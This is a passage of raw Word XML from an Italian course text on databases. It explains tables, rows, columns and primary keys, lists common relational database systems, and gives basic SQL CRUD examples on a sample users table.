        <w:t xml:space="preserve">colonne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="124"/>
    <w:bookmarkStart w:id="125" w:name="tabelle-righe-colonne"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tabelle, righe, colonne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un foglio strutturato con colonne predefinite. Per esempio, la tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di un sito potrebbe essere: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username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">data_registrazione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">mario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">mario@esempio.it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2025-01-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">giulia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">giulia@esempio.it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2025-02-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">marco</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">marco@esempio.it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2025-03-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">colonne</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">data_registrazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) sono i tipi di informazioni memorizzate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">righe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(le tre file di Mario, Giulia, Marco) sono i singoli record.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La colonna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chiave primaria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un identificativo unico per ogni riga, generato automaticamente dal database, mai duplicato. È così che possiamo riferirci a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l’utente numero 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">senza ambiguità.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un’applicazione tipica ha decine di tabelle correlate fra loro: utenti, prodotti, ordini, pagamenti, fatture, log. Il design di queste tabelle si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del database, e si studia in dettaglio nel corso di Basi di Dati.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="125"/>
    <w:bookmarkStart w:id="126" w:name="tipi-di-database"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tipi di database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esistono molte famiglie di database. Per il nostro corso ci interessa una famiglia sola, la più usata: i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">database relazionali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">RDBMS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Relational DataBase Management System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). I principali:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: minimalista,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tutto in un file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non serve un server separato. Perfetto per la didattica e per applicazioni piccole. Lo useremo per tutto il corso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: open source, potentissimo, standard di fatto per le applicazioni web professionali serie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MariaDB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: open source, molto diffusi storicamente, leggermente meno avanzati di PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft SQL Server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: commerciale, dominante in ambiente Windows aziendale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: commerciale, dominante in grandi enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dal punto di vista dell’apprendimento, sapere usare bene SQLite ti dà già la base per tutti gli altri: il linguaggio per parlarci (SQL) è quasi identico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="126"/>
    <w:bookmarkEnd w:id="127"/>
    <w:bookmarkStart w:id="128" w:name="X10787d6c46a6b69b5b7f4832e3e1daf1483f464"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="477" w:name="sec_3_10"/>
      <w:r>
        <w:t xml:space="preserve">3.10 SQL: il linguaggio per parlare ai database</w:t>
      </w:r>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Structured Query Language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è il linguaggio standardizzato con cui un’applicazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">al database. È un linguaggio dichiarativo: tu scrivi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">cosa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vuoi, il database decide</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ottenerlo nel modo più efficiente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le quattro operazioni fondamentali sono:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> colonne </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tabella </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> condizione;       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- LEGGI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tabella (colonne) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VALUES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (valori);      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- CREA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tabella </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> colonna </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> valore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cond;     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- MODIFICA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tabella </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> condizione;               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- CANCELLA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si chiamano spesso con l’acronimo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CRUD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Create, Read, Update, Delete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempi concreti sulla tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Leggi tutti gli utenti registrati nel 2025</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, username, email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utenti</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> data_registrazione </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'2025-01-01'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Inserisci un nuovo utente</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utenti (username, email)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VALUES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'luca'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'luca@esempio.it'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Modifica l'email di Mario</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utenti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mario.rossi@esempio.it'</w:t>
      </w:r>
      <w:r>
        <w:br/>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Elimina l'utente con id 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utenti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p>
